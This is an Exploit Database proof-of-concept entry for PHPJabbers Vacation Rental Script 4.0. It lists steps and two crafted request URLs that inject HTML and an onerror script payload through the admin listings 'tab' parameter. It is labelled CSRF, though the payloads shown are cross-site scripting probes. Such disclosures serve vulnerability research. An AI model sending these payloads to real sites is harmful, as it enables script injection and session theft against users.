PHPJabbers Vacation Rental Script 4.0 – CSRF

• Exploit Database
• 13 阅读

• 作者： Hasan Ali YILDIR
  日期： 2023-08-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51672/

• # Exploit Title: PHPJabbers Vacation Rental Script 4.0 - CSRF
  # Date: 05/08/2023
  # Exploit Author: Hasan Ali YILDIR
  # Vendor Homepage: https://www.phpjabbers.com/
  # Software Link: https://www.phpjabbers.com/vacation-rental-script/
  # Version: 4.0
  # Tested on: Windows 10 Pro
  
  ## Description
  
  The attacker can send to victim a link containing a malicious URL in an email or instant message
  can perform a wide variety of actions, such as stealing the victim's session token or login credentials
  
  
  Technical Detail / POC
  
  ==========================
  
  1. Login Account
  2. Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
  3. Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21)
  
  
  [1] Cross-Site Request Forgery
  
  Request:
  https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><font%20color="red">CSRF%20test</font>
  
  [2] Cross-Site Scripting (XSS)
  
  Request:
  https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><image/src/onerror=prompt(8)>